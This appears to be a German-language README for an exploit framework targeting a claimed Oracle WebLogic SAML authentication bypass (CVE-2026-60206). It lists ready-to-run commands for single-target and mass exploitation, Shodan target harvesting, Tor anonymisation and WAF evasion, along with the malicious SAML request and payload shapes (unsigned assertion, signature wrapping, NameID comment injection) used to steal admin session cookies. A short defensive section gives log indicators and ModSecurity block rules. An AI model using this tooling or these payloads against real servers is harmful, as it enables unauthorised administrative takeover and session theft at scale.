
👾 CVE-2026-60206 - Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Bash- & Python-Versionen. Funktionen: --detect sichere Prüfung, --exploit combo/unsigned/xsw/nameid/all, --shodan Integration, --tor Unterstützung, Massen-Scanning, JSON/CSV/JSONL-Ausgabe, Cookie-Validierung. 🛡️ CVSS 9.9 Kritisch - Ethisch nutzen, legal bleiben. 🔒

Exploit-Framework & Massen-Scanner
Nur für autorisierte Sicherheitstests.
Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt.
Die Autoren und Mitwirkenden sind nicht für Missbrauch oder Schäden verantwortlich, die durch diese Software verursacht werden. Die Benutzer sind allein dafür verantwortlich, dass sie vor dem Testen die ausdrückliche schriftliche Genehmigung des Eigentümers des Zielsystems einholen. Unbefugter Zugriff auf Computersysteme ist nach dem Computer Fraud and Abuse Act (CFAA) und ähnlichen Gesetzen weltweit illegal.
Durch die Nutzung dieser Software erklären Sie sich damit einverstanden:
⚠️ WARNUNG: Diese Schwachstelle wird aktiv in freier Wildbahn ausgenutzt. Unbefugte Nutzung kann zu schwerwiegenden rechtlichen Konsequenzen führen.
CVE-2026-60206 ist eine kritische Schwachstelle für einen nicht authentifizierten Authentifizierungs-Bypass in der SAML-Implementierung (Security Assertion Markup Language) des Oracle WebLogic Servers. Sie ermöglicht es entfernten Angreifern, die SAML-Authentifizierung zu umgehen und ohne gültige Anmeldedaten administrativen Zugriff auf die WebLogic-Konsole zu erlangen.
SAML-Injection: Die Schwachstelle beruht auf einer mangelhaften Validierung von SAML-Assertions. Angreifer können bösartige SAML-Antworten erstellen, die die Authentifizierungsprüfungen umgehen.
Signatur-Bypass: Die Schwachstelle ermöglicht es, die XML-Signaturvalidierung durch XML-Signature-Wrapping-Angriffe (XSW) zu umgehen, bei denen Angreifer bösartige Assertions mit legitimen Signaturen umhüllen.
NameID-Manipulation: Angreifer können Kommentare injizieren oder das NameID-Feld manipulieren, um sich als privilegierte Benutzer auszugeben.
Admin-Zugriff: Eine erfolgreiche Ausnutzung verschafft dem Angreifer administrativen Zugriff auf die WebLogic-Server-Konsole mit voller Kontrolle.
Das komplette Multi-Exploit zu Bildungszwecken verkettet mehrere SAML-Angriffsvektoren, um einen Authentifizierungs-Bypass zu erreichen, mit erweiterten Funktionen für Massen-Scanning, Cookie-Diebstahl und administrativen Zugriff.
--detect)Der sichere Verifizierer führt eine nicht-intrusive Schwachstellenerkennung durch, ohne schädliche Payloads auszuführen oder Systemänderungen vorzunehmen.
curl (für die Bash-Version)pip (für die Bibliothek requests, Python-Version)# Python version
pip install requests urllib3
# Optional: Shodan support
pip install shodan
# Bash version: curl only (no additional dependencies)
[!NOTE] Die Bash-Version funktioniert ausschließlich mit
curlund hat keine externen Abhängigkeiten. Die Python-Version benötigtrequestsundurllib3(optional:shodanfür die Shodan-Integration).
exploit.py)# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin
# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v
# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json
# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv
# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit
# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20
# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl
# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json
# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0
# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify
# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin
# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json
# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20
# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json
# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl
# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080
# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify
# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json
# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin
# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt
# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify
# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080
⚠️ Wichtig: Diese Schwachstelle betrifft selbst gehostete WebLogic-Server-Bereitstellungen. Wenden Sie die Oracle-CPU Juli 2026 umgehend an.
Die Schwachstelle ermöglicht es Angreifern, die SAML-Authentifizierung zu umgehen, indem sie bösartige SAML-Antworten erstellen, die von der SAML-Implementierung von WebLogic nicht ordnungsgemäß validiert werden.
Verwundbarer Endpunkt:
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded
SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/
Unsigned-Assertion
saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>
</saml2:Assertion>
XML-Signature-Wrapping (XSW)
ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>
<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>
NameID-Kommentarinjektion
<saml2:NameID Format="...">
lowpriv</saml2:NameID>
Eine erfolgreiche Ausnutzung liefert ein JSESSIONID-Cookie, das administrativen Zugriff auf die WebLogic-Konsole gewährt.
Das gestohlene Cookie kann verwendet werden, um:
Durchsuchen Sie Ihre WebLogic-Logs nach Folgendem:
access.log – Anfragen an /saml2/sp/acs, /saml2/acs mit ungewöhnlichen SAML-Parameterndomain.log – Authentifizierungs-Bypass-Versuche mit ungültigen SAML-Assertionsdiagnostic.log – SAML-Parsing-Fehler oder Fehler bei der SignaturvalidierungSAMLResponse-Parameter, die Folgendes enthalten:
<saml2:Assertion>-Tags<saml2:NameID>-Feldernjavascript: oder eval() in Parameternconfig.xml, jps-config.xml)autodeploy-Verzeichnisweblogic.security-Dateien# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10001,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Multiple SAML Assertions',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"
# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10002,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - NameID Comments',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"
# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
"id:10003,phase:1,deny,status:403,\
msg:'CVE-2026-60206 - Unsigned Assertion',\
chain"
SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"
| Attribut | Wert |
|---|
| 📅 Entdeckt | Juli 2026 (Oracle-CPU) |
| ⚠️ CVSS-Score | 9.9 (KRITISCH) |
| 📋 CISA KEV | Hinzugefügt am 21. Juli 2026 |
| 🎯 Betroffene Produkte | Oracle WebLogic Server (Fusion Middleware) |
| 🔄 Behobene Versionen | Oracle-CPU Juli 2026 |
| 🔓 Authentifizierung | Nicht erforderlich (Pre-Auth) |
| 🌍 Aktive Ausnutzung | In freier Wildbahn bestätigt (Juli 2026) |
| Funktion | Beschreibung |
|---|
| 🚀 Multi-Vektor-Exploit | 7 Angriffsvektoren: unsigned, xsw_v1-4, nameid, combo |
| 💻 Massen-Scanning | Gleichzeitiges Scannen mit Thread-Pool (Python) / FIFO (Bash) |
| 🔐 Cookie-Diebstahl | Entwendet JSESSIONID für Session-Hijacking |
| 👑 Admin-Konsolenzugriff | Vollständiger administrativer Zugriff auf die WebLogic-Konsole |
| 📁 Versionserkennung | Erkennt WebLogic-Versionen und Schwachstellenstatus |
| 🌐 Batch-Scanning | Massen-Exploit mehrerer Ziele mit Threading |
| 🎯 Sichere Erkennung | Optionales --detect-Flag zur nicht-intrusiven Schwachstellenverifizierung |
| 🧩 Shodan-Integration | Lädt Ziele direkt aus der Shodan-Suche |
| 🔍 Tor-Unterstützung | Anonymisiert Scans mit Tor-Proxy |
| 📊 Mehrere Ausgabeformate | JSON-, CSV-, JSONL-Streaming-Ausgabe |
| 🪟 Plattformübergreifend | Unterstützt Linux, macOS, BSD, Alpine, WSL |
| 🔒 Thread-sicher | Verwendet Sperrmechanismen für parallele Vorgänge |
| 📋 Automatisches Speichern von Sessions | Speichert erfolgreiche Cookies für die spätere Verwendung |
| ⚙️ WAF-Bypass | User-Agent-Rotation und zufällige Verzögerungen |
| Vektor | Beschreibung |
|---|
unsigned | Nicht authentifizierte SAML-Assertion ohne Signatur |
xsw_v1 | XML-Signature-Wrapping – Mehrere Assertions |
xsw_v2 | XSW – Umgehung der eingebetteten Signatur |
xsw_v3 | XSW – Namespace-Manipulation |
xsw_v4 | XSW – Injektion mehrerer Assertions |
nameid | NameID-Kommentarinjektion |
combo | Kombinierter Angriff (unsigned + XSW + NameID) |
| Funktion | Beschreibung |
|---|
| 🔍 WebLogic-Erkennung | Identifiziert WebLogic-Instanzen über LoginForm.jsp |
| 📊 Versionserkennung | Erkennt spezifische WebLogic-Versionen und Patch-Level |
| 🧪 SAML-Endpunkt-Erkennung | Testet auf SAML-ACS-Endpunkte |
| 🔒 Nicht-intrusiv | Identifiziert nur verwundbare Versionen |
| 📋 JSON/CSV-Ausgabe | Exportiert Ergebnisse für Berichte |
| 🔄 Massen-Scanning | Scannt mehrere Ziele mit Threading-Unterstützung |
| Oracle-WebLogic-Version | Status |
|---|
| 12.2.1.4.0 | 🔴 VERWUNDBAR |
| 14.1.1.0.0 | 🔴 VERWUNDBAR |
| 14.1.2.0.0 | 🔴 VERWUNDBAR |
| 15.1.1.0.0 | 🔴 VERWUNDBAR |
| Andere Versionen | Oracle-CPU Juli 2026 prüfen |